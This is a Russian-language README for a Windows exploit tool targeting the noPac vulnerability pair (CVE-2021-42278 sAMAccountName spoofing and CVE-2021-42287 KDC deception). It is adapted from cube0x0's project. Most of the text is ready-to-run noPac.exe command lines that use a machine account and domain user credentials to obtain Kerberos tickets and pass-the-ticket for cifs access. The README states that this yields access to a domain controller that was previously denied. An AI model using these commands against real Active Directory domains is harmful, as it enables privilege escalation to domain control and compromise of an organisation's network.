
CVE-2021-42287/CVE-2021-42278 Exploiter
Этот проект возник из изучения принципов noPac. На основе проекта cube0x0 были внесены некоторые изменения. В исходный код добавлены комментарии с личным пониманием.
Анализ уязвимости можно посмотреть в моей статье в блоге: Анализ noPac
noPac — это комбинация двух уязвимостей: CVE-2021-42278 (подмена sAMAccountName) и CVE-2021-42287 (обман KDC). Успешная эксплуатация возможна только при одновременном выполнении условий обеих уязвимостей.
Примеры: Получение TGT и ST
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs
Примеры: PTT
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
Более распространённый метод — PTT:
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
До использования noPac нет доступа к DC.

Использование noPac.
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

После PTT, снова перейдя в текущее окно, можно успешно получить доступ к DC.

Обратите внимание: программа может работать только на машинах с .NET 4.0+; Windows Server 2012 по умолчанию имеет .NET 4.0, Windows Server 2008 — .NET 3.5.
Проверить версию .NET на машине:
dir c:\Windows\Microsoft.NET\Framework64
